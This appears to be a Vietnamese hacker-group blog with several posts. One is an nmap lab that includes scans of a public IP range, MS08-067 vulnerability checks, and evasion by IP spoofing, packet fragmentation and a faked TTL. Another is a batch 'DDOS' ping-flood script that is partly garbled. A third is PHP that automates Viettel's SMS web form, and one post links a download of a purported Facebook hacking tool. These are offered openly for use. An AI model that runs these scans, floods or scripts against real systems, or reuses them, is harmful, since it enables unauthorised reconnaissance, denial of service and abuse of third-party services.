VNHacker International team

VNHacker International team
Cộng Đồng Hacker Chi Nhành VN

Thứ Năm, 22 tháng 1, 2015

Giới Thiệu


Thứ Bảy, 10 tháng 1, 2015

Bài 1 NMAP SCANNING

Bài Học Số 1 **** Nmap Scanning
Bài 1: Nmap Scanning
1. Mục đích bài lab
- Sơ đồ bài lab như sau:
Internet
Attacker
172.16.34.0/24 Router
- PC attacker sử dụng hệ điều hành Back Track 5, trong đó đã được install mặc
định chương trình nmap. Ngoài ra ta có thể download và cài đặt nmap có thể
install trên Window và Linux.
- Mục đích bài lab: sử dụng Nmap để xác định các thông số hệ điều hành, port,
dịch vụ tương ứng với…
- Nmap là một trong những network scanner rất hiệu quả. Thông qua nmap ta
có thể thực hiện quá trình scan với các kỹ thuật khác nhau như SYN scan, TCP
Connection scan, Xmas scan, Null scan…
2. Các bước thực hiện
- Ta có thể sử dụng nmap hỗ giao diện đồ họa và giao diện dòng lệnh. Giao diện
dòng đồ họa sử dụng chương trình zendmap. Còn ở giao diện dòng lệnh thì ta
sử dụng câu lệnh nmap.
Bước 1: ta xem giúp đỡ của câu lệnh NMAP
Bước 2: thực hiện quá trình ping sweep cho đường mạng 192.168.1.0/24 để xác định các host đang có trong đường mạng bằng câu lệnh “nmap -sP -v 172.16.34.1/24”
Bước 3: Ta cần xác định xem ở IP 172.16.34.18 đang có nhưng port nào đang mở. Để làm việc này ta có thể sử dụng các dạng scan khác nhau. Ví dụ ở đây ta sử dụng kỹ thuật SYN scan với câu lệnh “nmap –sS 172.16.34.18”
Bước 4: xác định giá trị port trong quá trình scan. Mặc định chương trình sẽ scan tất cả các port. Ví dụ ta cần xác định trong đường mạng 172.16.34.1/24 thì đang có bao nhiêu máy đang mở port 445,139,80,3389 ta có thể sử dụng câu lệnh “nmap -sT -p 445,139,3389 172.16.34.1/24”
Bước 5: Sử dụng nmap scan đường mạng với IP Public bên ngoài với câu lệnh “nmap -sS -p 80 222.253.166.1/24 > /root/Desktop/scan_adsl.txt” . Như vậy kết quả scan sẽ được ghi thành file scan_adsl.txt
Bước 6: Sử dụng nmap để xác định các thông số của các ứng dụng được triển khai trên server. Ta sử dụng “nmap -p 1-65535 -T4 -A -v 192.168.0.4
- Bước 7: Trong nmap hỗ trợ sử dụng các scripts đển scan một lỗi ứng dụng nào đó. Đầu tiên ta có thể sử dụng câu lệnh “locate nmap” để xác định các file script đang được hỗ trợ trong nmap. Ví dụ ta có thể sử dụng kiểm tra lỗi ms08-067 của các máy trong đường mạng “nmap -sT --script smb-check-vulns.nse -p 139,445 172.16.34.1/24”
Ngoài ra ta có thể kiểm tra xem trong mạng có máy nào đang chuyển card mạng sang Promicious mode để sniffer traffic trên đường truyền “nmap --script sniffer-detect 172.16.34.1/24”
- Bước 8: Trong quá trình scan ta nên thay đổi các giá trị IP source, lưu lượng gói tin gửi trong thời gian 1 giây, thực hiện phân mảnh gói tin, giả thông số ttl. Ví dụ
ta thực hiện câu lệnh “nmap -sS -p 3389,445,139,23,22,80 --max-rate 50 -S 10.0.0.1 192.168.1.78 -ttl 128 -f -e eth0 -Pn” -sS : SYN Scan -p : port --max-rate: luu luong maximum per second -f: fragment -S: Spoofing IP address -e: xac dinh interface -ttl: xac dinh gia tri ttl ( mac dinh window la 128 )

Thứ Năm, 18 tháng 12, 2014

Happy Christmart

Chúc mừng giáng sinh các anh chị em hacker việt nam:
http://ceh.890m.com/index.html
We are hacker vn
We are legion
We are forigve
Expect VN

Pro Facebook v2.0

Đã cập nhật và fix lỗi phần mềm facebook pro v2.0
Link hướng dẫn by Anonymous Team:
https://www.youtube.com/watch?v=43GuIwJzP9E
Download tại đây :
https://www.mediafire.com/?hzg7azoqoj193mb
Bản quyền đã mua lại với giá 1230$ USD Các bạn test giùm nếu không được báo lỗi gấp mình sẽ cho bển bán kiểm tra lại 

Thứ Tư, 17 tháng 12, 2014

Code DDOS

Code DDOS
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
4 Tạo một chương trình DDOS sử dụng NotepadDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

Merry Chrismart with VNHacker

Tặng các ACE team VNHacker Chào mọi người
Mình đến từ tổ chức VNHacker International Team . Hôm nay với trang web này mình gửi tặng tất cả các bạn những ai thấy link này thấy hình ảnh này sẽ có một mùa giáng sinh tràn đầy hạnh phúc một năm mới cực kỳ tốt đẹp.
http://ceh.890m.com/index.html
Chúc các bạn vui vẻ và có những phút giây thư giãn
VNHacker_Phạm Hoàng Thông

Code Face SMS Viettel

Code Face Viettel
function SMS_VIETTEL($sdt=false,$noidung=false,$captcha=fal se){
Global $cookie;
$url = "http://www.vietteltelecom.vn/send-sms.html";
$html = _vget($url,false,$cookie);
if(!inStr($html,'SDT CUA BAN'))
{
$token = getStr($html,'name="signin[_csrf_token]" value="','"');
$post = "signin%5B_csrf_token%5D=$token&signin%5Busername% 5D=usernamecuaban&signin%5Bpassword%5D=passwordcuaban";
$html = _vget($url,$post,$cookie);
}
if($captcha == false)
{
$captcha = _vget("http://www.vietteltelecom.vn/captcha?".time(),false,$cookie);
return base64_encode($captcha);
}else{
$token = getStr($html,'name="vtp_send_sms_form[_csrf_token]" value="','"');
$post = "vtp_send_sms_form%5B_csrf_token%5D=$token&selectM sisdnSms=SDT CUA BAN&vtp_send_sms_form%5Btype%5D=1&vtp_send_sms_form%5 Breceiver%5D=$sdt&vtp_send_sms_form%5Bmessage%5D=$ noidung&vtp_send_sms_form%5Bcaptcha%5D=$captcha";
$html = _vget($url,$post,$cookie);
if(inStr($html,'Tin nhắn của bạn đã được gửi') || inStr($html,'Tin nhắn của bạn đã được gửi tới tổng đài chờ xử lý'))
{
return "OK";
}else{
return "FAIL";
}
}
}